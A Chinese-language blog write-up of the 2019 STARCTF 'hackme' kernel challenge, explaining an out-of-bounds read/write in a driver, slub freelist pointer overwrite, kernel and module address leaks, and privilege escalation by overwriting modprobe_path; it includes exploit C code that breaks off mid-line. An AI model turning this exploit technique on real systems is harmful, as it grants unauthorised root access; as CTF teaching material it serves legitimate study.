<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory | sir</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="花落空庭饮青茶 画扇浅醉染风华月照山林几时休 御剑江湖愁晚秋">
<meta name="keywords" content="Linux-kernel">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory">
<meta property="og:url" content="https://cc-sir.github.io/2019/08/29/Linux-kernel4/index.html">
<meta property="og:site_name" content="sir">
<meta property="og:description" content="花落空庭饮青茶 画扇浅醉染风华月照山林几时休 御剑江湖愁晚秋">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_1.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_2.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_3.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_4.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_cin_kernel.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_cout_kernel.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_delete.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_alloc.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_pool.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_5.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_6.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_7.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_8.png">
<meta property="og:image" content="https://cc-sir.github.io/img/kernel4_9.png">
<meta property="og:updated_time" content="2019-08-29T13:58:01.522Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory">
<meta name="twitter:description" content="花落空庭饮青茶 画扇浅醉染风华月照山林几时休 御剑江湖愁晚秋">
<meta name="twitter:image" content="https://cc-sir.github.io/img/kernel4_1.png">
  
    <link rel="alternative" href="/atom.xml" title="sir" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/touxiang.png" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">钞sir</a></h1>
        </hgroup>

        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=1787684615@qq.com" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/cc-sir" title="github">github</a>
                            
                                <a class="fl QQ" target="_blank" href="tencent://QQInterLive/?Cmd=2&Uin=1787684615" title="QQ">QQ</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Android/" style="font-size: 10px;">-Android</a> <a href="/tags/Windows/" style="font-size: 10px;">-Windows</a> <a href="/tags/pwn-堆/" style="font-size: 10px;">-pwn-堆</a> <a href="/tags/writeup/" style="font-size: 12.5px;">-writeup</a> <a href="/tags/Linux-kernel/" style="font-size: 20px;">Linux-kernel</a> <a href="/tags/pwn-Fmtstr/" style="font-size: 10px;">pwn-Fmtstr</a> <a href="/tags/pwn-堆/" style="font-size: 15px;">pwn-堆</a> <a href="/tags/pwn-栈/" style="font-size: 17.5px;">pwn-栈</a> <a href="/tags/writeup/" style="font-size: 17.5px;">writeup</a> <a href="/tags/渗透/" style="font-size: 10px;">渗透</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://ThunderJie.github.io/">ThunderJie</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://optimic.github.io/">观樂。</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">我已无力接住你，再也不能抗风雨</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">钞sir</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/touxiang.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">钞sir</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=1787684615@qq.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/cc-sir" title="github">github</a>
                    
                        <a class="QQ" target="_blank" href="tencent://QQInterLive/?Cmd=2&Uin=1787684615" title="QQ">QQ</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-Linux-kernel4" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/08/29/Linux-kernel4/" class="article-date">
      <time datetime="2019-08-29T13:58:01.522Z" itemprop="datePublished">2019-08-29</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Linux Kernel Exploit 内核漏洞学习(4)-RW Any Memory
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Linux-kernel/">Linux-kernel</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>花落空庭饮青茶 画扇浅醉染风华<br>月照山林几时休 御剑江湖愁晚秋</p>
<a id="more"></a>
<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>RW Any Memory的全称是Read and write any memory, 就是内存任意读写;通常这种类型的漏洞是由于越界读写或者错误引用了指针操作造成可以修改控制某个区域里面的指针,导致我们可以改变程序的常规读写区域甚至程序执行流程….<br>这里我是利用2019 STARCTF里面的hackeme来演示和学习这种漏洞的利用,其中环境和题目我放在<a href="https://github.com/cc-sir/ctf-challenge/tree/master/2019%20STARCTF%20hackme" target="_blank" rel="noopener">github</a>上面了.需要的话可以自行下载学习….</p>
<h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><h2 id="modprobe-path"><a href="#modprobe-path" class="headerlink" title="modprobe_path"></a>modprobe_path</h2><p>modprobe_path指向了一个内核在运行未知文件类型时运行的二进制文件;当内核运行一个错误格式的文件的时候,会调用这个modprobe_path所指向的二进制文件去，如果我们将这个字符串指向我们的自己的二进制文件,那么在发生错误的时候就可以执行我们自己二进制文件了….<br>这里modprobe_path的地址可以通过cat直接查看到:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/kallsyms | grep modprobe_path</span><br></pre></td></tr></table></figure></p>
<p><img src="/img/kernel4_1.png" alt="modprobe_path"><br>原理代码如下,其实就是调用了call_usermodehelper函数:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __request_module(<span class="keyword">bool</span> wait, <span class="keyword">const</span> <span class="keyword">char</span> *fmt, ...) </span><br><span class="line">&#123; </span><br><span class="line">    va_list args; </span><br><span class="line">    <span class="keyword">char</span> module_name[MODULE_NAME_LEN]; </span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span> max_modprobes; </span><br><span class="line">    <span class="keyword">int</span> ret; </span><br><span class="line"><span class="comment">// char modprobe_path[KMOD_PATH_LEN] = "/sbin/modprobe"; </span></span><br><span class="line">    <span class="keyword">char</span> *argv[] = &#123; modprobe_path, <span class="string">"-q"</span>, <span class="string">"--"</span>, module_name, <span class="literal">NULL</span> &#125;; </span><br><span class="line">    <span class="keyword">static</span> <span class="keyword">char</span> *envp[] = &#123; <span class="string">"HOME=/"</span>, </span><br><span class="line">                <span class="string">"TERM=linux"</span>, </span><br><span class="line">                <span class="string">"PATH=/sbin:/usr/sbin:/bin:/usr/bin"</span>, </span><br><span class="line">                <span class="literal">NULL</span> &#125;; <span class="comment">// 环境变量. </span></span><br><span class="line">    <span class="keyword">static</span> <span class="keyword">atomic_t</span> kmod_concurrent = ATOMIC_INIT(<span class="number">0</span>); </span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> MAX_KMOD_CONCURRENT 50    <span class="comment">/* Completely arbitrary value - KAO */</span> </span></span><br><span class="line">    <span class="keyword">static</span> <span class="keyword">int</span> kmod_loop_msg; </span><br><span class="line"></span><br><span class="line">    va_start(args, fmt); </span><br><span class="line">    ret = vsnprintf(module_name, MODULE_NAME_LEN, fmt, args);   </span><br><span class="line">    va_end(args); </span><br><span class="line">    <span class="keyword">if</span> (ret &gt;= MODULE_NAME_LEN) </span><br><span class="line">        <span class="keyword">return</span> -ENAMETOOLONG; </span><br><span class="line">    max_modprobes = min(max_threads/<span class="number">2</span>, MAX_KMOD_CONCURRENT);    </span><br><span class="line">    atomic_inc(&amp;kmod_concurrent); </span><br><span class="line">    <span class="keyword">if</span> (atomic_read(&amp;kmod_concurrent) &gt; max_modprobes) &#123; </span><br><span class="line">        <span class="comment">/* We may be blaming an innocent here, but unlikely */</span> </span><br><span class="line">        <span class="keyword">if</span> (kmod_loop_msg++ &lt; <span class="number">5</span>) </span><br><span class="line">            printk(KERN_ERR </span><br><span class="line">                   <span class="string">"request_module: runaway loop modprobe %s\n"</span>, </span><br><span class="line">                   module_name); </span><br><span class="line">        atomic_dec(&amp;kmod_concurrent);                           </span><br><span class="line">        <span class="keyword">return</span> -ENOMEM;                                         </span><br><span class="line">    &#125; </span><br><span class="line">    ret = call_usermodehelper(modprobe_path, argv, envp,        <span class="comment">// 执行用户空间的应用程序</span></span><br><span class="line">            wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC); </span><br><span class="line">    atomic_dec(&amp;kmod_concurrent);                                </span><br><span class="line">    <span class="keyword">return</span> ret; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h2 id="mod-tree"><a href="#mod-tree" class="headerlink" title="mod_tree"></a>mod_tree</h2><p>mod_tree是一块包含了模块指针的内存地址的内核地址,通过查看这个位置我们可以获取到ko文件的地址,在我们需要泄露模块基地址,但是在堆或栈中没有找到的时候可以查看这块内存区域:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep mod_tree /proc/kallsyms</span><br></pre></td></tr></table></figure></p>
<p><img src="/img/kernel4_2.png" alt="mod_tree"></p>
<h1 id="具体分析"><a href="#具体分析" class="headerlink" title="具体分析"></a>具体分析</h1><p>首先我们看到这个hackme.ko文件开始传参大小为0x20:<br><img src="/img/kernel4_3.png" alt="send"><br>通过分析我们得出ko文件通过一个数据结构heap作为交互接口:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">heap</span>&#123;</span></span><br><span class="line">    <span class="keyword">size_t</span> id;</span><br><span class="line">    <span class="keyword">size_t</span> *data;</span><br><span class="line">    <span class="keyword">size_t</span> len;</span><br><span class="line">    <span class="keyword">size_t</span> offset;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p><img src="/img/kernel4_4.png" alt="heap"><br>程序主要有4个功能:读,写,删除和申请:</p>
<h2 id="cin-kernel"><a href="#cin-kernel" class="headerlink" title="cin_kernel"></a>cin_kernel</h2><p><img src="/img/kernel4_cin_kernel.png" alt="cin_kernel"><br>主要是通过用户输入的长度,从用户态中写相应长度的数据到内核;</p>
<h2 id="cout-kernel"><a href="#cout-kernel" class="headerlink" title="cout_kernel"></a>cout_kernel</h2><p><img src="/img/kernel4_cout_kernel.png" alt="cout_kernel"><br>从内核中读出相应长度的数据到用户态;</p>
<h2 id="delete"><a href="#delete" class="headerlink" title="delete"></a>delete</h2><p><img src="/img/kernel4_delete.png" alt="delete"><br>这个代码主要是删除pool中的内容;</p>
<h2 id="alloc"><a href="#alloc" class="headerlink" title="alloc"></a>alloc</h2><p><img src="/img/kernel4_alloc.png" alt="alloc"><br>申请一块内存,地址和大小放在pool数组中;<br>所以整个程序的功能就是维护了一个全局数组pool,其第一个成员记录内核堆地址，第二个成员记录堆的大小，并且这个数组位于驱动的.bss段,这个我们可以通过gdb调试得出:<br><img src="/img/kernel4_pool.png" alt="pool"><br>所以比较明显的漏洞点:在cin_kernel和cout_kernel功能中存在明显的越界问题,当我们的offset是负数的时候,v17.offset + v17.len就可以向上越界读写任意长度的内存;</p>
<h1 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h1><p>因为slub分配器的分配原理之前提过,和fastbin的原理比较像,所以我们可以通过越界读写把pool数组的位置申请下来,那么我们就可以控制pool数组,然后将数组上面的指针改为其他地方的地址,那么我们就可以实现任意地址读写了;</p>
<h2 id="泄露内核地址"><a href="#泄露内核地址" class="headerlink" title="泄露内核地址"></a>泄露内核地址</h2><p>因为我们可以堆地址往上越界读取数据,所以在堆地址上面的地址中一定存在有内核地址,而我们发现往上面偏移0x200的位置就存在有内核地址:<br><img src="/img/kernel4_5.png" alt="5"><br><img src="/img/kernel4_6.png" alt="6"><br>很明显这是应该内核地址,所以我们可以得到内核基地址并且得到mod_tree的地址:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cout_kernel(<span class="number">0</span>,mem,<span class="number">0x200</span>,<span class="number">-0x200</span>);</span><br><span class="line">kernel_addr = *((<span class="keyword">size_t</span> *)mem) - <span class="number">0x8472c0</span>;</span><br><span class="line">mod_tree_addr = kernel_addr + <span class="number">0x811000</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"[*]kernel_addr: 0x%16llx\n"</span>,kernel_addr);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"[*]mod_tree_add: 0x%16llx\n"</span>,mod_tree_addr);</span><br></pre></td></tr></table></figure></p>
<h2 id="泄露模块地址"><a href="#泄露模块地址" class="headerlink" title="泄露模块地址"></a>泄露模块地址</h2><p>根据fastbin的特点,我们知道fd指针指向下一次我们可以申请的地址,如果我们将fd指针修改了,我们就可以拿到我们想要的内存了,同理我们这里也是通过覆盖fd指针为mod_tree的地址,然后就可以查看mod_tree的内容然后就可以得到模块地址了:<br><img src="/img/kernel4_7.png" alt="7"><br>覆盖fd指针的方法是先通过向上越访问就可以修改到fd指针,然后alloc两个块,就可以拿到mod_tree了:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">memset</span>(mem,<span class="string">'B'</span>,<span class="number">0x100</span>);</span><br><span class="line">*((<span class="keyword">size_t</span>  *)mem) = mod_tree_addr + <span class="number">0x50</span>;</span><br><span class="line">cin_kernel(<span class="number">4</span>,mem,<span class="number">0x100</span>,<span class="number">-0x100</span>);</span><br><span class="line"><span class="built_in">memset</span>(mem,<span class="string">'C'</span>,<span class="number">0x100</span>);</span><br><span class="line">alloc(<span class="number">5</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">alloc(<span class="number">6</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">cout_kernel(<span class="number">6</span>,mem,<span class="number">0x40</span>,<span class="number">-0x40</span>);</span><br><span class="line">ko_addr = *((<span class="keyword">size_t</span> *)mem) - <span class="number">0x2338</span>;</span><br></pre></td></tr></table></figure></p>
<p>需要注意的是不要把mod_tree地址开始的位置全部覆盖了,应该往下偏移一定的位置,不然我们就得不到模块基地址了,有了模块基地址后我们就可以得到pool的地址了,就可以利用同样的方法把pool申请下来,然后我们就有任意地址读写的能力了;</p>
<h1 id="Use-Modprobe-path"><a href="#Use-Modprobe-path" class="headerlink" title="Use Modprobe_path"></a>Use Modprobe_path</h1><p>通常我们有了任意地址读写能力后,我们可以通过修改cred结构体或者劫持VDSO来进行高权限的操作,但是这里我们使用一种比较有意思的方法来进行高权限的操作;<br>modprobe_path所指的位置通常是发生了错误的时候才调用的:<br><img src="/img/kernel4_8.png" alt="8"><br>如果我们把这个位置换成我们最近的二进制文件,那么当发生错误的时候就会以root权限去运行我们二进制文件….<br>通常我们可以通过运行一个错误格式的二进制文件来触发调用modprobe_path的内容:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">system(<span class="string">"echo -ne '#!/bin/sh\n/bin/cp /flag /home/pwn/flag\n/bin/chmod 777 /home/pwn/flag' &gt; /home/pwn/copy.sh"</span>);</span><br><span class="line">	system(<span class="string">"chmod +x /home/pwn/copy.sh"</span>);</span><br><span class="line">	system(<span class="string">"echo -ne '\\xff\\xff\\xff\\xff' &gt; /home/pwn/sir"</span>);</span><br><span class="line">	system(<span class="string">"chmod +x /home/pwn/sir"</span>);</span><br></pre></td></tr></table></figure></p>
<p>需要注意的是system里面的命令要程序的全路径，而不能是相对路径,cp命令要写成/bin/cp;<br>而修改modprobe_path内容的方法和泄露模块地址等用到的方法是一样的….</p>
<h1 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h1><p>exp.c:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">heap</span>&#123;</span></span><br><span class="line">    <span class="keyword">size_t</span> id;</span><br><span class="line">    <span class="keyword">size_t</span> *data;</span><br><span class="line">    <span class="keyword">size_t</span> len;</span><br><span class="line">    <span class="keyword">size_t</span> offset;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">int</span> fd;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">alloc</span><span class="params">(<span class="keyword">int</span> id, <span class="keyword">char</span> *data, <span class="keyword">size_t</span> len)</span></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">heap</span> <span class="title">h</span>;</span></span><br><span class="line">    h.id = id;</span><br><span class="line">    h.data = data;</span><br><span class="line">    h.len = len;</span><br><span class="line">    ioctl(fd,<span class="number">0x30000</span>,&amp;h);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">delete</span><span class="params">(<span class="keyword">int</span> id)</span></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">heap</span> <span class="title">h</span>;</span></span><br><span class="line">    h.id = id;</span><br><span class="line">    ioctl(fd,<span class="number">0x30001</span>,&amp;h);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">cin_kernel</span><span class="params">(<span class="keyword">int</span> id, <span class="keyword">char</span> *data, <span class="keyword">size_t</span> len, <span class="keyword">size_t</span> offset)</span></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">heap</span> <span class="title">h</span>;</span></span><br><span class="line">    h.id = id;</span><br><span class="line">    h.data = data;</span><br><span class="line">    h.len = len;</span><br><span class="line">    h.offset = offset;</span><br><span class="line">    ioctl(fd,<span class="number">0x30002</span>,&amp;h);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">cout_kernel</span><span class="params">(<span class="keyword">int</span> id, <span class="keyword">char</span> *data, <span class="keyword">size_t</span> len, <span class="keyword">size_t</span> offset)</span></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">heap</span> <span class="title">h</span>;</span></span><br><span class="line">    h.id = id;</span><br><span class="line">    h.data = data;</span><br><span class="line">    h.len = len;</span><br><span class="line">    h.offset = offset;</span><br><span class="line">    ioctl(fd,<span class="number">0x30003</span>,&amp;h);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">    fd = open(<span class="string">"/dev/hackme"</span>,<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">size_t</span> heap_addr,kernel_addr,mod_tree_addr,ko_addr,pool_addr;</span><br><span class="line">    <span class="keyword">char</span> *mem = <span class="built_in">malloc</span>(<span class="number">0x1000</span>);</span><br><span class="line">    <span class="keyword">if</span>(fd &lt; <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"[*]OPEN KO ERROR!\n"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">memset</span>(mem,<span class="string">'A'</span>,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">0</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">1</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">2</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">3</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">4</span>,mem,<span class="number">0x100</span>);</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">delete</span>(<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">delete</span>(<span class="number">3</span>);</span><br><span class="line">    cout_kernel(<span class="number">4</span>,mem,<span class="number">0x100</span>,<span class="number">-0x100</span>);</span><br><span class="line">    heap_addr = *((<span class="keyword">size_t</span>  *)mem) - <span class="number">0x100</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"[*]heap_addr: 0x%16llx\n"</span>,heap_addr);</span><br><span class="line"></span><br><span class="line">    cout_kernel(<span class="number">0</span>,mem,<span class="number">0x200</span>,<span class="number">-0x200</span>);</span><br><span class="line">    kernel_addr = *((<span class="keyword">size_t</span> *)mem) - <span class="number">0x0472c0</span>;</span><br><span class="line">    mod_tree_addr = kernel_addr + <span class="number">0x011000</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"[*]kernel_addr: 0x%16llx\n"</span>,kernel_addr);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"[*]mod_tree_add: 0x%16llx\n"</span>,mod_tree_addr);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">memset</span>(mem,<span class="string">'B'</span>,<span class="number">0x100</span>);</span><br><span class="line">    *((<span class="keyword">size_t</span>  *)mem) = mod_tree_addr + <span class="number">0x50</span>;</span><br><span class="line">    cin_kernel(<span class="number">4</span>,mem,<span class="number">0x100</span>,<span class="number">-0x100</span>);</span><br><span class="line">    <span class="built_in">memset</span>(mem,<span class="string">'C'</span>,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">5</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    alloc(<span class="number">6</span>,mem,<span class="number">0x100</span>);</span><br><span class="line">    cout_kernel(<span class="number">6</span>,mem,<span class="number">0x40</span>,<span class="number">-0x40</span>);</span><br><span class="line">    ko_addr = *((<span class="keyword">size_t</span> *)mem) - <span class="number">0x2338</span>;</span><br><span class="line">    pool_addr = ko_addr + <span class="number">0x2400</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"[*]ko_addr: 0x%16llx\n"</span>,ko_addr);</span><br><span class="line">    <span 